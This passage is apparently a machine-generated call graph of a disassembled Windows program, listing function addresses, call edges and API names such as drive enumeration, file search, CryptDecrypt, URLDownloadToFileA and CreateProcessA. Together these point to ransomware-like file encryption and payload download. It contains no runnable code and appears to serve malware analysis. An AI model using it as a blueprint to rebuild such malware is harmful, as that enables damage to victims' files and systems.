40c8a2 #825 4870->4869 4871->4869 4871->4870 4872->4819 4874 40ce68 4873->4874 4875 40ce5a 4873->4875 4877 40ce94 #825 4874->4877 4878 40bd9e #825 Sleep 4874->4878 4875->4874 4876 40ce6e #825 4875->4876 4876->4874 4877->4878 4878->4816 4878->4817 4880 40c761 4879->4880 4881 40c77e #825 4879->4881 4882 40c775 #825 4880->4882 4883 40c76f 4880->4883 4881->4829 4882->4881 4883->4881 4885 40b898 4884->4885 4886 40b95b CreateProcessA 4884->4886 4901 40b6a0 CreateDirectoryA 4885->4901 4888 40b9b4 4886->4888 4889 40b9bf WaitForSingleObject 4886->4889 4888->4840 4890 40b9e4 CloseHandle CloseHandle 4889->4890 4891 40b9d8 WaitForSingleObject 4889->4891 4890->4840 4891->4890 4892 40b8a9 4893 40b8e9 sprintf GetFileAttributesA 4892->4893 4915 40b780 CreateDirectoryA 4892->4915 4895 40b946 CopyFileA 4893->4895 4896 40b93b 4893->4896 4895->4886 4896->4840 4897 40b8c1 4897->4893 4898 40b780 60 API calls 4897->4898 4899 40b8d9 4898->4899 4899->4893 4900 40b8e0 4899->4900 4900->4840 4923 412920 4901->4923 4904 40b6d8 DeleteFileA 4904->4892 4905 40b6ec 4926 412940 4905->4926 4907 40b70e 4908 40b719 4907->4908 4909 40b76a 4907->4909 4910 412940 14 API calls 4907->4910 4908->4892 4935 412a00 4909->4935 4913 40b738 sprintf 4910->4913 4912 40b770 4912->4892 4932 4129e0 4913->4932 4916 40b81b 4915->4916 4917 40b7ae GetTempFileNameA DeleteUrlCacheEntry URLDownloadToFileA 4915->4917 4916->4897 4918 40b810 DeleteFileA 4917->4918 4919 40b7f6 4917->4919 4918->4916 4920 40b6a0 54 API calls 4919->4920 4921 40b809 4920->4921 4921->4918 4922 40b827 DeleteFileA 4921->4922 4922->4897 4946 4127e0 #823 4923->4946 4925 40b6cf 4925->4904 4925->4905 4927 412964 4926->4927 4928 412959 4926->4928 4929 412969 4927->4929 4959 411cf0 4927->4959 4928->4907 4929->4907 4931 412982 4931->4907 4992 412990 4932->4992 4934 4129f8 4934->4907 4936 412a15 4935->4936 4937 412a09 4935->4937 4938 412a1a 4936->4938 4998 4127a0 4936->4998 4937->4912 4938->4912 4941 412a7d #825 4941->4912 4942 412a44 #825 4943 412a4d 4942->4943 4944 412a61 #825 4943->4944 4945 412a6a #825 4943->4945 4944->4945 4945->4941 4947 412815 4946->4947 4948 41287a 4946->4948 4947->4948 4949 41283d #823 4947->4949 4950 411c00 15 API calls 4948->4950 4949->4948 4951 41289d 4950->4951 4952 4128a6 4951->4952 4953 4128f8 #823 4951->4953 4954 4128e5 4952->4954 4955 4128b4 #825 4952->4955 4956 4128bd 4952->4956 4953->4925 4954->4925 4955->4956 4957 4128d6 #825 4956->4957 4958 4128cd #825 4956->4958 4957->4954 4958->4957 4960 412231 4959->4960 4961 411d11 4959->4961 4960->4931 4961->4960 4962 411ac0 free free 4961->4962 4965 411d27 4961->4965 4962->4965 4963 411d37 4963->4931 4964 411dc2 4967 411ddc 4964->4967 4968 4113e0 SetFilePointer SetFilePointer ReadFile 4964->4968 4965->4963 4965->4964 4966 411390 SetFilePointer SetFilePointer ReadFile 4965->4966 4966->4964 4969 411350 SetFilePointer SetFilePointer ReadFile 4967->4969 4968->4964 4970 411dfe 4969->4970 4971 411460 SetFilePointer SetFilePointer ReadFile 4970->4971 4972 411e15 4971->4972 4973 411e1c 4972->4973 4974 410a50 SetFilePointer SetFilePointer 4972->4974 4973->4931 4975 411e3e 4974->4975 4976 411e45 4975->4976 4977 411e56 #823 4975->4977 4976->4931 4978 410af0 ReadFile 4977->4978 4979 411e78 4978->4979 4980 411e83 #825 4979->4980 4981 411e9d _mbsstr 4979->4981 4980->4931 4983 411f15 _mbsstr 4981->4983 4983->4981 4984 411f2c _mbsstr 4983->4984 4984->4981 4985 411f43 _mbsstr 4984->4985 4985->4981 4986 411f5a 4985->4986 4987 411b80 SystemTimeToFileTime 4986->4987 4988 412063 LocalFileTimeToFileTime 4987->4988 4991 4120b6 4988->4991 4989 412203 4989->4931 4990 4121fa #825 4990->4989 4991->4989 4991->4990 4993 4129a3 4992->4993 4994 412998 4992->4994 4995 4129a8 4993->4995 4996 412360 28 API calls 4993->4996 4994->4934 4995->4934 4997 4129cf 4996->4997 4997->4934 4999 4127b1 4998->4999 5000 4127a9 4998->5000 5002 4127c7 4999->5002 5003 410f70 CloseHandle #825 free free free 4999->5003 5001 411ac0 free free 5000->5001 5001->4999 5002->4941 5002->4942 5002->4943 5003->5002 5005 40d8ec 5004->5005 5006 40daad closesocket 5005->5006 5007 40baa8 5005->5007 5006->5007 5007->4804 5009 40c9f6 #823 5008->5009 5013 40ca40 5009->5013 5011 40ca81 5011->4860 5012 40ca87 #825 5012->5011 5013->5011 5013->5012 5015 40cbf3 5014->5015 5016 40cb00 5014->5016 5015->4866 5017 40cb26 5016->5017 5023 40cb90 5016->5023 5018 40cb31 5017->5018 5019 40cb2c ?_Xran@std@ 5017->5019 5033 40cd80 5018->5033 5019->5018 5020 40cbe9 5022 40cc60 5 API calls 5020->5022 5022->5015 5023->5020 5025 40cbaa 5023->5025 5024 40cb38 5027 40cb6a 5024->5027 5028 40cb47 memmove 5024->5028 5026 40c7b0 #825 5025->5026 5029 40cbb3 5026->5029 5031 40cd80 4 API calls 5027->5031 5050 40cc60 5028->5050 5029->4866 5032 40cb7d 5031->5032 5032->4866 5034 40cd93 5033->5034 5035 40ce27 5033->5035 5034->5035 5036 40cdd0 5034->5036 5037 40cdc9 ?_Xlen@std@ 5034->5037 5035->5024 5038 40cdf8 5036->5038 5041 40cde2 5036->5041 5037->5036 5039 40ce0a 5038->5039 5040 40cdfc 5038->5040 5039->5035 5046 40c7b0 #825 5039->5046 5042 40c7b0 #825 5040->5042 5043 40cde6 5041->5043 5044 40ce1f 5041->5044 5045 40ce05 5042->5045 5047 40c7b0 #825 5043->5047 5048 40c9c0 2 API calls 5044->5048 5045->5024 5046->5044 5049 40cdf3 5047->5049 5048->5035 5049->5024 5051 40cc73 5050->5051 5052 40cc6e ?_Xlen@std@ 5050->5052 5053 40cd04 5051->5053 5054 40cc88 5051->5054 5055 40ccae 5051->5055 5052->5051 5053->5054 5060 40cd08 5053->5060 5056 40cc90 5054->5056 5059 40c9c0 2 API calls 5054->5059 5058 40ccd9 #825 5055->5058 5062 40ccc4 5055->5062 5056->5027 5057 40cd4c 5063 40c9c0 2 API calls 5057->5063 5058->5062 5059->5056 5060->5056 5060->5057 5061 40cd43 #825 5060->5061 5064 40cd26 5060->5064 5061->5057 5062->5027 5065 40cd5d 5063->5065 5066 40c9c0 2 API calls 5064->5066 5065->5027 5067 40cd3b 5066->5067 5067->5027 5068->4786 5069->4786 5071 412af5 5070->5071 5072 412ac8 free 5070->5072 5071->4794 5072->5071 5619 408c40 5620 408d5c 5619->5620 5622 408c97 5619->5622 5621 408c9d _ftol _ftol 5621->5622 5622->5620 5622->5621 6163 409a40 6167 409d40 6163->6167 6166 409ae7 #2414 #2414 6168 409a87 OffsetRect CreateRectRgn #1641 #5781 6167->6168 6168->6166 6363 409f40 PtVisible 6364 40cf40 6372 40d300 6364->6372 6366 40cf61 6367 40d300 6 API calls 6366->6367 6368 40cf66 6366->6368 6369 40cf87 6367->6369 6370 40d300 6 API calls 6369->6370 6371 40cf8c 6369->6371 6370->6371 6373 40d31f 6372->6373 6374 40d32e 6372->6374 6373->6366 6375 40d339 6374->6375 6376 40d373 time 6374->6376 6378 40d363 6374->6378 6379 40d378 6374->6379 6375->6366 6380 40d493 6376->6380 6381 40d41e 6376->6381 6394 40d2b0 6378->6394 6383 40d3b0 6379->6383 6384 40d380 6379->6384 6385 40d4b1 6380->6385 6390 40d4a8 free 6380->6390 6381->6380 6392 40d487 time 6381->6392 6393 40d469 Sleep 6381->6393 6398 412a90 malloc 6383->6398 6386 40d2b0 memmove 6384->6386 6385->6366 6386->6376 6388 40d3b6 6389 40d3c1 6388->6389 6391 40d2b0 memmove 6388->6391 6389->6366 6390->6385 6391->6376 6392->6380 6392->6381 6393->6381 6395 40d2f5 6394->6395 6396 40d2be 6394->6396 6395->6376 6397 40d2c3 memmove 6396->6397 6397->6395 6397->6397 6398->6388 6172 407650 6173 40765e 6172->6173 6176 407670 6172->6176 6174 4076a0 20 API calls 6173->6174 6177 407665 #2379 6174->6177 6175 407690 #2379 6176->6175 6178 40b620 9 API calls 6176->6178 6179 40768d 6178->6179 6179->6175 5623 404050 #616 5624 404068 5623->5624 5625 40405f #825 5623->5625 5625->5624 6057 404150 6062 404170 #2414 #800 #800 #795 6057->6062 6059 404158 6060 404168 6059->6060 6061 40415f #825 6059->6061 6061->6060 6062->6059 6169 403250 6170 403261 #825 6169->6170 6171 40326a 6169->6171 6170->6171 6180 413254 _exit 6063 413556 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5487 405a60 5534 40b620 FindWindowW 5487->5534 5491 405aab #2514 5557 403f20 #2414 5491->5557 5493 405ae9 5558 403f20 #2414 5493->5558 5495 405b04 5559 403f20 #2414 5495->5559 5497 405b1f 5560 403f20 #2414 5497->5560 5499 405b3f 5561 403f20 #2414 5499->5561 5501 405b5a 5562 403f20 #2414 5501->5562 5503 405b75 5563 403f20 #2414 5503->5563 5505 405b90 5564 403f20 #2414 5505->5564 5507 405bab 5565 403f20 #2414 5507->5565 5509 405bc6 5566 403f20 #2414 5509->5566 5511 405be1 5567 403f20 #2414 5511->5567 5513 405bfc 5568 403f90 #2414 5513->5568 5515 405c10 5569 403f90 #2414 5515->5569 5517 405c24 #800 #800 #800 #800 #781 5570 4050a0 #800 #795 5517->5570 5519 405c9c 5571 4050a0 #800 #795 5519->5571 5521 405cb0 5572 404170 #2414 #800 #800 #795 5521->5572 5523 405cc4 5573 404170 #2414 #800 #800 #795 5523->5573 5525 405cd8 5574 404170 #2414 #800 #800 #795 5525->5574 5527 405cec 5575 404170 #2414 #800 #800 #795 5527->5575 5529 405d00 5576 405d90 #654 #765 5529->5576 5531 405d14 5577 405d90 #654 #765 5531->5577 5533 405d28 #609 #609 #616 #641 5535 40b634 7 API calls 5534->5535 5536 405a8a #1134 #2621 #6438 5534->5536 5535->5536 5537 40b687 ExitProcess 5535->5537 5538 4060e0 #324 #567 #567 #567 5536->5538 5578 4085c0 7 API calls 5538->5578 5540 406162 5541 4085c0 9 API calls 5540->5541 5542 406172 5541->5542 5582 404090 7 API calls 5542->5582 5544 406182 5583 404090 7 API calls 5544->5583 5546 406192 5584 404090 7 API calls 5546->5584 5548 4061a2 5585 404090 7 API calls 5548->5585 5550 4061b2 5586 405000 #567 #540 5550->5586 5552 4061c2 5553 405000 2 API calls 5552->5553 5554 4061d2 #567 #540 #540 #540 #540 5553->5554 5588 407640 5554->5588 5556 4062cb 7 API calls 5556->5491 5557->5493 5558->5495 5559->5497 5560->5499 5561->5501 5562->5503 5563->5505 5564->5507 5565->5509 5566->5511 5567->5513 5568->5515 5569->5517 5570->5519 5571->5521 5572->5523 5573->5525 5574->5527 5575->5529 5576->5531 5577->5533 5579 408660 #6140 5578->5579 5580 408654 5578->5580 5579->5540 5580->5579 5581 40865a GetSysColor 5580->5581 5581->5579 5582->5544 5583->5546 5584->5548 5585->5550 5587 40504a 5586->5587 5587->5552 5588->5556 6064 403560 6065 40358c #4376 6064->6065 6066 40356e GetExitCodeThread 6064->6066 6067 403593 6065->6067 6066->6065 6066->6067 5608 40db60 send 5626 403860 SendMessageA 5627 403892 SendMessageA 5626->5627 5628 403883 #1200 5626->5628 5629 4038d1 5627->5629 5630 4038a5 SendMessageA CreateThread 5627->5630 5630->5629 5631 4038e0 5630->5631 5634 4038f0 5631->5634 5633 4038e9 5653 403eb0 6 API calls 5634->5653 5636 403916 SendMessageA 5637 4039e1 5636->5637 5638 403937 SendMessageA 5636->5638 5700 403eb0 6 API calls 5637->5700 5639 403951 5638->5639 5640 403958 5638->5640 5654 403af0 fopen 5639->5654 5671 401e90 5640->5671 5643 4039ea CloseHandle 5643->5633 5645 403961 sprintf 5676 402020 5645->5676 5647 403998 5652 40399c 5647->5652 5685 403a20 5647->5685 5648 4039cd 5693 401f30 5648->5693 5651 4039c8 #1200 5651->5648 5652->5648 5652->5651 5653->5636 5655 403b41 5654->5655 5656 403b28 5654->5656 5657 401e90 InitializeCriticalSection 5655->5657 5656->5640 5658 403b4d 5657->5658 5659 402020 14 API calls 5658->5659 5660 403b67 5659->5660 5661 403b6b 5660->5661 5669 403b9b 5660->5669 5662 401f30 6 API calls 5661->5662 5664 403b82 5662->5664 5663 403c61 fclose 5665 401f30 6 API calls 5663->5665 5664->5640 5667 403c8f 5665->5667 5666 403bb2 fgets 5668 403c5f 5666->5668 5666->5669 5667->5640 5668->5663 5669->5663 5669->5666 5669->5668 5701 402650 MultiByteToWideChar 5669->5701 5793 404640 InitializeCriticalSection 5671->5793 5673 401eb6 5794 404640 InitializeCriticalSection 5673->5794 5675 401ec4 5675->5645 5795 4046f0 5676->5795 5678 402031 5679 402035 5678->5679 5680 402048 GlobalAlloc 5678->5680 5681 4046f0 12 API calls 5678->5681 5679->5647 5682 402061 5680->5682 5683 402066 GlobalAlloc 5680->5683 5681->5680 5682->5647 5684 402079 5683->5684 5684->5647 5686 403a32 GetLogicalDrives 5685->5686 5687 403adc 5685->5687 5691 403a48 5686->5691 5687->5652 5688 403a53 GetDriveTypeW 5690 403a81 GetDiskFreeSpaceExW 5688->5690 5688->5691 5689 403ace 5689->5652 5690->5691 5691->5688 5691->5689 5812 4026b0 5691->5812 5902 401fa0 5693->5902 5695 401f60 5911 404690 DeleteCriticalSection 5695->5911 5697 401f7a 5912 404690 DeleteCriticalSection 5697->5912 5699 401f8a 5699->5637 5700->5643 5704 402560 wcscpy wcsrchr 5701->5704 5703 40269a 5703->5669 5705 4025c9 wcscat 5704->5705 5706 402599 _wcsicmp 5704->5706 5707 4025bd 5705->5707 5706->5707 5708 4025ae _wcsicmp 5706->5708 5717 4020a0 CreateFileW 5707->5717 5708->5705 5708->5707 5710 4025eb 5711 402629 DeleteFileW 5710->5711 5712 4025ef DeleteFileW 5710->5712 5713 402634 5711->5713 5712->5713 5714 4025fa 5712->5714 5713->5703 5715 402617 5714->5715 5716 4025fe MoveFileW 5714->5716 5715->5703 5716->5703 5718 402143 GetFileTime ReadFile 5717->5718 5729 402139 _local_unwind2 5717->5729 5720 40217c 5718->5720 5718->5729 5721 402196 ReadFile 5720->5721 5720->5729 5722 4021b3 5721->5722 5721->5729 5723 4021c3 ReadFile 5722->5723 5722->5729 5724 4021ea ReadFile 5723->5724 5723->5729 5725 402208 ReadFile 5724->5725 5724->5729 5726 402226 5725->5726 5725->5729 5727 402233 CloseHandle CreateFileW 5726->5727 5728 4022f9 CreateFileW 5726->5728 5727->5729 5731 402264 SetFilePointer ReadFile 5727->5731 5728->5729 5730 40232c 5728->5730 5729->5710 5750 404af0 5730->5750 5731->5729 5732 402297 5731->5732 5732->5729 5734 4022a4 SetFilePointer WriteFile 5732->5734 5734->5729 5736 4022ce 5734->5736 5735 40234d 5737 402372 5735->5737 5739 404af0 4 API calls 5735->5739 5736->5729 5738 4022db SetFilePointer SetEndOfFile 5736->5738 5737->5729 5755 40a150 5737->5755 5741 402497 SetFileTime 5738->5741 5739->5737 5742 4024e0 _local_unwind2 5741->5742 5743 4024bc CloseHandle MoveFileW 5741->5743 5742->5710 5743->5742 5744 402477 SetFilePointerEx SetEndOfFile 5744->5741 5746 4023e0 ReadFile 5746->5729 5747 4023a7 5746->5747 5747->5729 5747->5744 5747->5746 5762 40b3c0 5747->5762 5751 404b04 EnterCriticalSection CryptDecrypt 5750->5751 5752 404afc 5750->5752 5753 404b3b LeaveCriticalSection 5751->5753 5754 404b2d LeaveCriticalSection 5751->5754 5752->5735 5753->5735 5754->5735 5756 40a184 5755->5756 5757 40a15e ??0exception@@QAE@ABQBD _CxxThrowException 5755->5757 5758 40a197 ??0exception@@QAE@ABQBD _CxxThrowException 5756->5758 5759 40a1bd 5756->5759 5757->5756 5758->5759 5760 40a1d0 ??0exception@@QAE@ABQBD _CxxThrowException 5759->5760 5761 40a1f6 5759->5761 5760->5761 5761->5747 5763 40b3d0 ??0exception@@QAE@ABQBD _CxxThrowException 5762->5763 5764 40b3ee 5762->5764 5763->5764 5765 40b602 ??0exception@@QAE@ABQBD _CxxThrowException 5764->5765 5773 40b410 5764->5773 5766 40b5ba 5768 40b0c0 4 API calls 5766->5768 5774 402424 WriteFile 5766->5774 5768->5766 5770 40b4cf ??0exception@@QAE@ABQBD _CxxThrowException 5772 40b4ed 5770->5772 5771 40b59c ??0exception@@QAE@ABQBD _CxxThrowException 5771->5766 5772->5766 5772->5771 5772->5774 5781 40adc0 5772->5781 5773->5770 5773->5772 5773->5773 5773->5774 5775 40b0c0 5773->5775 5774->5729 5774->5747 5776 40b0d0 ??0exception@@QAE@ABQBD _CxxThrowException 5775->5776 5777 40b0ee 5775->5777 5776->5777 5780 40b114 5777->5780 5787 40a9d0 5777->5787 5780->5773 5782 40add0 ??0exception@@QAE@ABQBD _CxxThrowException 5781->5782 5783 40adee 5781->5783 5782->5783 5784 40ae14 5783->5784 5790 40a610 5783->5790 5784->5772 5788 40a9e1 ??0exception@@QAE@ABQBD _CxxThrowException 5787->5788 5789 40a9ff 5787->5789 5788->5789 5789->5773 5791 40a621 ??0exception@@QAE@ABQBD _CxxThrowException 5790->5791 5792 40a63f 5790->5792 5791->5792 5792->5772 5793->5673 5794->5675 5796 4046b0 CryptAcquireContextA 5795->5796 5797 4046f8 5796->5797 5798 404709 5797->5798 5799 4046fc 5797->5799 5801 404711 CryptImportKey 5798->5801 5802 40473e 5798->5802 5800 404770 3 API calls 5799->5800 5804 404703 5800->5804 5805 404760 5801->5805 5806 404731 5801->5806 5803 4049b0 7 API calls 5802->5803 5808 40474c 5803->5808 5804->5678 5805->5678 5807 404770 3 API calls 5806->5807 5809 404738 5807->5809 5808->5805 5810 404770 3 API calls 5808->5810 5809->5678 5811 40475a 5810->5811 5811->5678 5813 40c8f0 #823 5812->5813 5814 4026e4 5813->5814 5815 40c8f0 #823 5814->5815 5816 402706 swprintf FindFirstFileW 5815->5816 5817 40274d 5816->5817 5831 4027b4 5816->5831 5851 402e00 5817->5851 5819 40276a #825 5821 402e00 2 API calls 5819->5821 5820 4027d4 wcscmp 5823 40295d FindNextFileW 5820->5823 5824 4027ee wcscmp 5820->5824 5825 4027a0 #825 5821->5825 5822 402978 FindClose 5829 40298d 5822->5829 5833 4029b9 5822->5833 5823->5822 5823->5831 5824->5823 5826 402808 swprintf GetFileAttributesW 5824->5826 5828 402ace 5825->5828 5830 4028b6 wcscmp 5826->5830 5826->5831 5827 4029ef swprintf DeleteFileW swprintf DeleteFileW 5834 402a6a #825 5827->5834 5835 402a4f 5827->5835 5828->5691 5829->5833 5841 402560 59 API calls 5829->5841 5830->5823 5832 4028d0 wcscmp 5830->5832 5831->5820 5831->5822 5831->5823 5844 402856 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N wcslen ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI 5831->5844 5857 402af0 _wcsnicmp 5831->5857 5832->5823 5837 4028e6 wcscmp 5832->5837 5833->5827 5843 4026b0 84 API calls 5833->5843 5839 402a94 5834->5839 5840 402aba #825 5834->5840 5846 402a66 5835->5846 5883 402e90 5835->5883 5837->5823 5842 4028fc ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N wcslen ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI 5837->5842 5839->5840 5848 402e90 2 API calls 5839->5848 5840->5828 5841->5829 5845 402da0 8 API calls 5842->5845 5843->5833 5879 402da0 #823 5844->5879 5849 4028a3 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 5845->5849 5846->5834 5848->5839 5849->5823 5852 402e10 5851->5852 5853 402e7a 5851->5853 5854 402e4c #825 5852->5854 5855 402e40 #825 5852->5855 5853->5819 5854->5852 5856 402e6d 5854->5856 5855->5854 5856->5819 5858 402b12 wcsstr 5857->5858 5859 402b1f 5857->5859 5858->5859 5860 402b30 _wcsicmp 5859->5860 5861 402be9 _wcsicmp 5859->5861 5862 402b42 5860->5862 5863 402b4d _wcsicmp 5860->5863 5864 402c07 _wcsicmp 5861->5864 5865 402bfc 5861->5865 5862->5831 5868 402b67 _wcsicmp 5863->5868 5869 402b5c 5863->5869 5866 402c21 _wcsicmp 5864->5866 5867 402c16 5864->5867 5865->5831 5866->5831 5867->5831 5870 402b81 _wcsicmp 5868->5870 5871 402b76 5868->5871 5869->5831 5872 402b90 5870->5872 5873 402b9b _wcsicmp 5870->5873 5871->5831 5872->5831 5874 402bb5 wcsstr 5873->5874 5875 402baa 5873->5875 5876 402bc4 5874->5876 5877 402bcf wcsstr 5874->5877 5875->5831 5876->5831 5877->5861 5878 402bde 5877->5878 5878->5831 5880 402dbf 5879->5880 5888 402f10 5880->5888 5882 402de4 5882->5849 5884 402ed0 #825 5883->5884 5885 402eb1 5883->5885 5884->5835 5886 402ec4 #825 5885->5886 5887 402ebd 5885->5887 5886->5884 5887->5884 5889 402f40 5888->5889 5896 403044 5888->5896 5890 402f68 5889->5890 5895 402fdb 5889->5895 5892 402f74 ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5890->5892 5893 402f6e ?_Xran@std@ 5890->5893 5891 403035 ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 5891->5896 5897 402f85 5892->5897 5893->5892 5894 402fc0 ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5894->5882 5895->5891 5898 402ff5 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 5895->5898 5896->5882 5897->5894 5899 402fa1 ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 5897->5899 5900 403006 5898->5900 5899->5894 5901 402fb7 ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI 5899->5901 5900->5882 5901->5894 5903 404770 3 API calls 5902->5903 5904 401fac 5903->5904 5905 404770 3 API calls 5904->5905 5906 401fb4 5905->5906 5906->5906 5908 401fe3 5906->5908 5909 401fd0 GlobalFree 5906->5909 5907 40200c 5907->5695 5908->5907 5910 401ff9 GlobalFree 5908->5910 5909->5908 5910->5907 5911->5697 5912->5699 6402 409f60 RectVisible 6403 401760 #6453 6404 401791 WaitForSingleObject TerminateThread CloseHandle 6403->6404 6405 4017b8 6403->6405 6404->6405 6406 40193e 6405->6406 6407 4018f6 6405->6407 6408 4017d8 sprintf fopen 6405->6408 6409 401915 6407->6409 6412 401903 rand 6407->6412 6410 401834 8 API calls 6408->6410 6411 4018da #1200 6408->6411 6409->6406 6413 401939 #1200 6409->6413 6410->6406 6411->6406 6412->6409 6413->6406 5913 404070 #693 5914 404088 5913->5914 5915 40407f #825 5913->5915 5915->5914 5916 40a070 DrawTextA 6069 408d70 6070 408e09 GetDeviceCaps 6069->6070 6072 408eb0 6070->6072 6078 408ed8 6070->6078 6073 408eba GetDeviceCaps GetDeviceCaps 6072->6073 6072->6078 6073->6078 6074 4090b6 #2414 6075 408f51 _ftol _ftol 6075->6078 6076 408fca _ftol _ftol _ftol 6077 409024 CreateSolidBrush #1641 6076->6077 6076->6078 6077->6078 6078->6074 6078->6075 6078->6076 6079 409048 FillRect #2414 6078->6079 6080 409083 #2754 6078->6080 6079->6078 6080->6078 6181 404670 6186 404690 DeleteCriticalSection 6181->6186 6183 404678 6184 404688 6183->6184 6185 40467f #825 6183->6185 6185->6184 6186->6183 6414 409b70 #2379 6421 403f70 6426 403f90 #2414 6421->6426 6423 403f78 6424 403f88 6423->6424 6425 403f7f #825 6423->6425 6425->6424 6426->6423 6427 404f70 #4476 6428 404f91 6427->6428 6429 404fc7 #3089 6427->6429 6428->6429 6430 404f9b 6428->6430 6187 403271 #2302 #2302 5083 401600 5084 4016e5 5083->5084 5085 40161a 5083->5085 5086 4016e9 #537 5084->5086 5096 4016de 5084->5096 5087 40161d 5085->5087 5088 40168f 5085->5088 5106 401970 #3092 #6199 #800 5086->5106 5090 401743 #2385 5087->5090 5093 401628 #537 5087->5093 5094 40165e 5087->5094 5091 401693 #537 5088->5091 5088->5096 5105 401970 #3092 #6199 #800 5091->5105 5092 401701 SendMessageA #2385 5103 401970 #3092 #6199 #800 5093->5103 5094->5096 5098 401663 #537 5094->5098 5096->5090 5104 401970 #3092 #6199 #800 5098->5104 5099 4016ab SendMessageA #2385 5100 401640 #2385 5102 40167b #2385 5103->5100 5104->5102 5105->5099 5106->5092 6188 406a00 #4476 6189 406a23 6188->6189 6193 406a62 6188->6193 6190 406a38 #3089 6189->6190 6189->6193 6191 406a46 #3089 6190->6191 6190->6193 6192 406a54 #3089 6191->6192 6191->6193 6192->6193 6431 403f00 6436 403f20 #2414 6431->6436 6433 403f08 6434 403f18 6433->6434 6435 403f0f #825 6433->6435 6435->6434 6436->6433 5108 413102 __set_app_type __p__fmode __p__commode 5109 413171 5108->5109 5110 413185 5109->5110 5111 413179 __setusermatherr 5109->5111 5120 4133b2 _controlfp 5110->5120 5111->5110 5113 41318a _initterm __getmainargs _initterm 5114 4131de GetStartupInfoA 5113->5114 5116 413212 GetModuleHandleA 5114->5116 5121 4133e6 #1576 5116->5121 5119 413236 exit _XcptFilter 5120->5113 5121->5119 5917 403810 WideCharToMultiByte 5920 403e60 SendMessageA #3998 SendMessageA 5917->5920 5919 403845 5920->5919 5921 403410 #4476 5922 403454 #3089 5921->5922 5923 403431 5921->5923 5924 40343b 5922->5924 5923->5922 5923->5924 5925 404410 SetCursor 6081 401110 #2302 6437 404310 6438 404333 6437->6438 6439 40433a #470 #5789 #5875 #6172 6437->6439 6440 4044c0 7 API calls 6438->6440 6441 40438a #5789 #755 6439->6441 6440->6439 6442 401f10 6443 401f30 6 API calls 6442->6443 6444 401f18 6443->6444 6445 401f28 6444->6445 6446 401f1f #825 6444->6446 6446->6445 6200 40ca19 6201 40ca26 6200->6201 6202 40ca28 #823 6200->6202 6201->6202 6213 409a20 6218 4099c0 6213->6218 6216 409a38 6217 409a2f #825 6217->6216 6219 409a03 6218->6219 6220 4099f3 #6170 6218->6220 6219->6216 6219->6217 6220->6219 5926 40a020 TabbedTextOutA 5589 401220 5590 4012c2 #2379 5589->5590 5591 401233 5589->5591 5592 401243 SendMessageA KillTimer #4853 5591->5592 5593 40126b SendMessageA 5591->5593 5592->5593 5594 401285 SendMessageA 5593->5594 5595 401297 5593->5595 5594->5595 5595->5590 5596 4012a1 SendMessageA 5595->5596 5596->5590 5597 4012b8 5596->5597 5597->5590 6203 405a20 6204 405a25 6203->6204 6207 4130bb 6204->6207 6210 41308f 6207->6210 6209 405a4a 6211 4130a4 __dllonexit 6210->6211 6212 413098 _onexit 6210->6212 6211->6209 6212->6209 6221 404620 #795 6222 404638 6221->6222 6223 40462f #825 6221->6223 6223->6222 5927 409c20 #3797 5928 409c40 #6734 5927->5928 5929 409c36 5927->5929 5930 409c5b SendMessageA 5928->5930 5931 409c78 5928->5931 5930->5931 5932 409ce4 5931->5932 5933 409caa 5931->5933 5934 409ce8 InvalidateRect 5932->5934 5937 409cf6 5932->5937 5935 409cd4 #4284 5933->5935 5936 409cc4 #4284 5933->5936 5934->5937 5935->5937 5936->5937 6451 409b20 6452 409b31 6451->6452 6453 409b33 #6140 6451->6453 6452->6453 5938 408c20 5943 408b40 5938->5943 5940 408c28 5941 408c38 5940->5941 5942 408c2f #825 5940->5942 5942->5941 5944 408bd0 5943->5944 5945 408b78 BitBlt 5943->5945 5947 408bd6 #2414 #640 5944->5947 5948 408bc1 #5785 5945->5948 5949 408bb5 #5785 5945->5949 5947->5940 5948->5947 5949->5947 6082 409920 6087 4098c0 6082->6087 6085 409938 6086 40992f #825 6086->6085 6088 4098f2 #5875 6087->6088 6089 4098fb 6087->6089 6088->6089 6089->6085 6089->6086 5950 413427 5951 41342c 5950->5951 5954 4133fe #1168 5951->5954 5955 413421 5954->5955 5956 413418 _setmbcp 5954->5956 5956->5955 5960 407c30 OpenClipboard 5961 407c42 GlobalAlloc 5960->5961 5962 407ca9 5960->5962 5963 407c64 EmptyClipboard GlobalLock GlobalUnlock SetClipboardData CloseClipboard 5961->5963 5964 407c5b CloseClipboard 5961->5964 5963->5962 5957 40d830 inet_addr 5958 40d844 gethostbyname 5957->5958 5959 40d84f 5957->5959 5958->5959 5965 404430 5966 40447b 5965->5966 5967 40443d _TrackMouseEvent #2379 5965->5967 5970 404489 5966->5970 5972 404530 5966->5972 5971 4044a1 SetCursor #2379 5970->5971 5973 4045c1 5972->5973 5974 404552 5972->5974 5973->5970 5974->5973 5975 404559 #289 #5789 GetTextExtentPoint32A #5789 #613 5974->5975 5975->5973 6094 406930 #6215 6095 402d30 6096 402d73 #825 6095->6096 6097 402d3f 6095->6097 6098 402d40 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N #825 6097->6098 6098->6098 6099 402d72 6098->6099 6099->6096 6224 405230 6231 405369 6224->6231 6234 40525a 6224->6234 6225 405552 InvalidateRect 6230 405560 6225->6230 6226 405285 6227 4052ee 7 API calls 6226->6227 6228 40528f #4277 #923 #858 #800 #800 6226->6228 6227->6225 6228->6225 6229 40539e 6232 405430 6229->6232 6233 4053aa 7 API calls 6229->6233 6231->6225 6231->6229 